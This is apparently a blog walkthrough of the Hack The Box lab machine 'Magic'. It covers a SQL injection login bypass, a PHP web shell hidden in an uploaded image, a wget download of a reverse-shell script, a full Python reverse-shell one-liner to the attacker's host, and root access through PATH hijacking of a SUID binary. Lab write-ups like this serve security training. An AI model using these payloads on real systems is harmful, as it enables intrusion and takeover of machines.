Any sufficiently advanced technology is indistinguishable from magic.Arthur C. Clarke
In this post, I’m writing a write-up for the machine Magic from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills.
Magic is a ‘Medium’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 15 and submitting the root flag your points will be raised by 30.
After I found that there is a webserver running on the HTTP port 80, I checked the website hosted on this webserver and found that the login page is vulnerable for SQL injection. After logging in on the web portal I’m able to upload images. With Burp Suite I was able to modify the request of the upload and embedded a shellcode into the image and gain access as www-data with a Reverse Shell.
In the root folder of the web server, I found the db.php5 fil with credentials. As te MySQL client isn’t installed on the server, I’m not able to make a connection to the database with these credentials. After further searching, I found some MySQL programs in the ‘/usr/bin’ folder. With the program mysqldump I’ve dumped the database ‘Magic’ which contains the login credentials for the user ‘theseus’.
After running LinEnum.sh I found that the program sysinfo is installed on this box, which is running in the root context. With privilege escalation using PATH variable, I was able to get a reverse shell to my machine and root this box.
Are you ready to see some magic?
As always I start this box with a Nmap port scan.
~$ nmap -sC -sV -oA ./nmap/magic.txt 10.10.10.185
The results of the port scan.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-18 15:01 EDT Nmap scan report for 10.10.10.185 Host is up (0.053s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA) | 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA) |_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Magic Portfolio Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.69 seconds
There are only two open ports.
- 22/tcp (SSH)
- 80/tcp (HTTP)
Enumeration web server
I start with the enumeration of the web server and visited the web page http://10.10.10.185. I’m landing on a web page, which has the ability to upload images. It seems to be an image hosting website.
On the left side at the bottom of this web page there is a logon button. This button redirects me to a login form.
After some trying, I’m able to login with this username and password
username: ' or 1=1 --
password: ' or 1=1 --
I’m now able to upload images.
Modify HTTP Post request on upload
I can now upload files, I tried to upload a PHP file, but that’s not gonna work. The server only allows image files to be uploaded. I need to fool the request. I use Burpsuite for this one. I like rabbits, so I take a nice rabbit picture. Downloaded a random PNG-file from Google and uploaded the file to the server. I intercepted the upload request and modified this request.
First, I changed the filename from myrabbit.png to myrabbit.php.png, this is line 8 in the image below. At the end of the header, I added my shellcode and removed the body. This is line 35 in the image.
<?php echo system($_REQUEST['shell']); ?>
After that, the image was uploaded I navigate the URL-bar to ‘http://10.10.10.185/uploads/myrabbit.php.png?shellcode=whoami’. I’ve now executed the command ‘whoami’ through the uploaded shellcode and the command got’s executed.
Reverse shell as www-data
I can now download, through the shellcode, my PHP-file which contains the reverse shell command to my machine, with: ‘http://10.10.10.185/images/uploads/myrabbit.php.png?shell=wget 10.10.10.14.42:8000/php-reverse-shell.php’, after the PHP-file is downloaded I executed this file with: ‘http://10.10.10.185/images/uploads/myrabbit.php.png?shell=php -f php-reverse-shell.php’. I got a reverse shell as the user www-data.
~$ whoami www-data
I invoked the command to upgrade the shell.
~$ python3 -c 'import pty;pty.spawn("/bin/bash")' [email protected]$
I have now an upgraded shell and can start the enumeration to get the user. From this point, I can start my reconnaissance to get the user flag. I start by enumerating the users on this box. In the home folder, I found that there is another user account listed on this box.
home$ ls theseus
I found the file ‘db.php5’ file on the location ‘www/Magic’ with the username theseus and the password iamkingtheseus. This are credentials for the MySQL database. With this credentials I can make a connection to this database and dump the MySQL database.
[email protected]:/tmp$ /usr/bin/mysqldump --databases Magic --user=theseus --password=iamkingtheseus > dump.sql
I got the credentials.
-- -- Dumping data for table `login` -- LOCK TABLES `login` WRITE; /*!40000 ALTER TABLE `login` DISABLE KEYS */; INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng'); /*!40000 ALTER TABLE `login` ENABLE KEYS */; UNLOCK TABLES; /*!40103 SET [email protected]_TIME_ZONE */; /*!40101 SET [email protected]_SQL_MODE */; /*!40014 SET [email protected]_FOREIGN_KEY_CHECKS */; /*!40014 SET [email protected]_UNIQUE_CHECKS */; /*!40101 SET [email protected]_CHARACTER_SET_CLIENT */; /*!40101 SET [email protected]_CHARACTER_SET_RESULTS */; /*!40101 SET [email protected]_COLLATION_CONNECTION */; /*!40111 SET [email protected]_SQL_NOTES */; -- Dump completed on 2020-04-22 14:18:50
Switch to the user theseus.
[email protected]:/tmp$ su - theseus su - theseus Password: Th3s3usW4sK1ng [email protected]:~$ whoami whoami theseus [email protected]:~$ ls ls Desktop Downloads Pictures Templates Videos Documents Music Public user.txt [email protected]:~$ cat user.txt cat user.txt eb0041b0dddb7b8610cb79e0fff91cb0 [email protected]:~$
Privilege Escalation using PATH variable
After I got the user flag I checked further on this machine with LinEnum.sh. I downloaded this script from my machine to this box and run the LinEnum.sh script. In the results, I found that /bin/sysinfo is installed on this machine.
[email protected]:~/Desktop$ bash LinEnum.sh [-] SGID files: ... -rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/7917/usr/bin/passwd -rwsr-xr-x 1 root root 136808 Jun 10 2019 /snap/core/7917/usr/bin/sudo -rwsr-xr-- 1 root systemd-resolve 42992 Jun 10 2019 /snap/core/7917/usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 428240 Mar 4 2019 /snap/core/7917/usr/lib/openssh/ssh-keysign -rwsr-sr-x 1 root root 106696 Oct 1 2019 /snap/core/7917/usr/lib/snapd/snap-confine -rwsr-xr-- 1 root dip 394984 Jun 12 2018 /snap/core/7917/usr/sbin/pppd -rwsr-xr-x 1 root root 26696 Jan 8 10:31 /bin/umount -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount -rwsr-x--- 1 root users 22040 Oct 21 2019 /bin/sysinfo -rwsr-xr-x 1 root root 43088 Jan 8 10:31 /bin/mount -rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su -rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping ...
The ‘bin’ directory is where all the executable programs are stored. The program ‘sysinfo’ does not comes pre-installed with Ubuntu. It is a custom program that is installed manually. When I run this program I can see all of the hardware information of this machine.
As this program is running in the root context, this can be a way to gain root privileges. I need only to find a way how I can exploit sysinfo. I started Googling and found an article from hackingarticles.in about how to gain privilege escalation using the PATH variable.
I need to get the pieces together. I asked one of my contacts from Hack The Box if he could help be putting the pieces together. And, so he would. He advised me to create a file lshw and place it in the directory /tmp/payload and then changing the PATH variable.
And so I did. I created the file with the reverse shell.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.39",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
I dropped this file in the /tmp/payload folder and set the permissions.
[email protected]:/tmp/payload$ chmod 775 lshw
Changed the PATH variable.
export PATH=/tmp/payload:$PATH export PATH=/tmp/payload:$PATH
Started a reverse shell listener on my box. And then the moment of truth… I invoked this command.
[email protected]:/tmp/payload$ /bin/sysinfo
And the reverse shell is established! Bingo, I can now get the root flag and take a beer.
[email protected]:/home/htb/boxes/machines/magic/http$ nc -lvp 6666 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::6666 Ncat: Listening on 0.0.0.0:6666 Ncat: Connection from 10.10.10.185. Ncat: Connection from 10.10.10.185:39596. # whoami root # id uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus) # ls lshw # pwd /tmp/payload # cd /root # cat root.txt d940dcff8146f4a3764d9f069541f368
Did you enjoy this write-up as much as I did writing it? Consider giving a respect point, my profile at Hack The Box: https://www.hackthebox.eu/home/users/profile/224856, Thanks in advance!
This blog is completely free of advertisements. Please consider buying me a coffee. Thanks!!Buy me a coffee